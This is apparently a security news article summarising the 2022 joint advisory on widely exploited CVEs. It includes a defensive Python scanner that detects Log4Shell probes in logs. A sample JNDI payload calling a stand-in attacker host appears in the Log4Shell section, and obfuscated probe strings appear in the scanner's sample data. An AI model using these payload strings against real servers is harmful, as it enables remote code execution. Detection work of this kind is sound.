Top 12 Most Routinely Exploited Vulnerabilities in 2022

Cybersecurity agencies from the United States, United Kingdom, Australia, Canada and New Zealand have jointly published a list of the 12 vulnerabilities most routinely exploited in 2022.

In 2022, malicious actors exploited older software vulnerabilities on unpatched, internet-facing systems more frequently than recently disclosed ones.

Report Summary

The new CISA joint Cybersecurity Advisory (CSA) outlines the 12 most exploited CVEs that impact Apache (Log4Shell), Atlassian, F5 Networks (BIG-IP), Fortinet, VMware, Zoho ManageEngine, Microsoft Exchange (ProxyShell) and other Microsoft products.

“Proof of concept (PoC) code was publicly available for many of the software vulnerabilities or vulnerability chains, likely facilitating exploitation by a broader range of malicious cyber actors,” the report added.

The following cybersecurity agencies contributed to the report (AA23-215A), published August 4, 2023:

  • United States: The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and Federal Bureau of Investigation (FBI)
  • Australia: Australian Signals Directorate’s Australian Cyber Security Centre (ACSC)
  • Canada: Canadian Centre for Cyber Security (CCCS)
  • New Zealand: New Zealand National Cyber Security Centre (NCSC-NZ) and Computer Emergency Response Team New Zealand (CERT NZ)
  • United Kingdom: National Cyber Security Centre (NCSC-UK).

Log4Shell

Log4Shell (CVE-2021-44228) is a remote code execution (RCE) vulnerability in Apache Log4j 2, disclosed in December 2021 and patched by The Apache Software Foundation in Log4j 2.15.0 on December 10, 2021. Log4j 2 evaluated JNDI lookups embedded in logged data, so an attacker who could get a string such as ${jndi:ldap://attacker-host/x} written to a log (for example through an HTTP header or form field that the application logs) could make the server fetch and execute attacker-controlled code. The separate issue of RCE via the JDBC Appender when an attacker controls the configuration file is a later Log4j 2 vulnerability (CVE-2021-44832, fixed in 2.17.1 in late December 2021) and should not be confused with Log4Shell.

It was later found that the fix in Log4j 2.15.0 was incomplete in certain non-default configurations, where attacker-controlled data could still reach a lookup through a Pattern Layout using a Context Lookup or Thread Context Map pattern. That follow-on issue was tracked as CVE-2021-45046 and fixed in Log4j 2.16.0, which removed message lookups and disabled JNDI access by default.
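A practical check for the mechanism described above, added here as an example and not code from the page, the advisory or the Log4j project: a Python scanner that first collapses the nested-lookup obfuscations seen in Log4Shell probes (${lower:...}, ${upper:...} and the ${name:-default} form, including ${::-j}) and only then matches on ${jndi:. The log lines it runs over are constructed for the example, and the addresses in them are placeholders.

```python
import re

# Constructed sample log lines for this example (not from the page or the advisory).
# Lines 0-2 carry hypothetical Log4Shell probes; line 3 is benign traffic.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.6 - - "GET /login HTTP/1.1" 200 "${jndi:rmi://203.0.113.9/x}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${lower:j}${upper:n}di:${::-l}dap://203.0.113.9/x}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "Mozilla/5.0 (X11; Linux x86_64)"',
]

# An innermost ${...} lookup: its body contains no further "$", "{" or "}".
INNER_LOOKUP_RE = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup with its URI scheme, matched only after de-obfuscation.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)\s*:", re.IGNORECASE)


def _resolve_lookup(body: str):
    """Evaluate the lookups attackers use purely to hide the string 'jndi'.

    Returns the substituted text, or None if the lookup is not one we resolve
    (e.g. ${jndi:...} itself, which must stay in place so JNDI_RE can see it).
    """
    if ":-" in body:                      # ${anything:-default}, including ${::-j}
        return body.split(":-", 1)[1]
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    return None


def _substitute(match: re.Match) -> str:
    resolved = _resolve_lookup(match.group(1))
    return match.group(0) if resolved is None else resolved


def normalize_lookups(text: str) -> str:
    """Collapse nested lookups from the inside out until nothing changes.

    Each substitution removes one ${...} pair, so the loop always terminates.
    """
    while True:
        new_text = INNER_LOOKUP_RE.sub(_substitute, text)
        if new_text == text:
            return text
        text = new_text


def find_jndi_lookups(lines):
    """Return (line_index, uri_scheme, normalized_lookup) for each line with a JNDI lookup."""
    hits = []
    for i, raw in enumerate(lines):
        normalized = normalize_lookups(raw)
        m = JNDI_RE.search(normalized)
        if m:
            # Report the lookup from "${" up to its closing brace.
            end = normalized.find("}", m.start())
            hits.append((i, m.group(1).lower(), normalized[m.start():end + 1]))
    return hits


if __name__ == "__main__":
    for idx, scheme, lookup in find_jndi_lookups(SAMPLE_LOG_LINES):
        print(f"line {idx}: jndi via {scheme}: {lookup}")
```

Matching on the literal string "jndi" alone misses the third sample line; normalizing first is what makes the nested-lookup variants visible, which is why the de-obfuscation step runs before the match rather than being bolted onto the regex.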

ProxyShell

In August 2021, attackers were observed scanning for and exploiting the ProxyShell vulnerabilities on unpatched Microsoft Exchange servers.

The ProxyShell chain consists of three vulnerabilities (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207) that Microsoft patched in the April and May 2021 Exchange Server security updates. CVE-2021-34473 is a pre-authentication path confusion in the Exchange front end, reachable through the Autodiscover endpoint, that lets an unauthenticated attacker reach backend services; CVE-2021-34523 is a privilege elevation in the Exchange PowerShell backend; and CVE-2021-31207 is a post-authentication arbitrary file write. Chained together, they give an unauthenticated attacker remote code execution (RCE) on the server.

Other exploited CVEs

The remaining eight CVEs on the advisory's list of 12 are:

  • CVE-2021-26084: Atlassian Confluence Server and Data Center (arbitrary code execution via OGNL injection)
  • CVE-2022-26134: Atlassian Confluence Server and Data Center (unauthenticated RCE via OGNL injection)
  • CVE-2022-1388: F5 Networks BIG-IP (missing authentication on the iControl REST interface)
  • CVE-2018-13379: Fortinet FortiOS and FortiProxy (SSL VPN path traversal exposing session credentials)
  • CVE-2022-30190: Microsoft multiple products (RCE through the Microsoft Support Diagnostic Tool, known as "Follina")
  • CVE-2022-22954: VMware Workspace ONE Access and Identity Manager (RCE via server-side template injection)
  • CVE-2022-22960: VMware Workspace ONE Access, Identity Manager, and vRealize Automation (improper privilege management allowing local privilege escalation)
  • CVE-2021-40539: Zoho ManageEngine ADSelfService Plus (REST API authentication bypass leading to RCE).

More details on these vulnerabilities are available in our previous articles, linked below.

Related Articles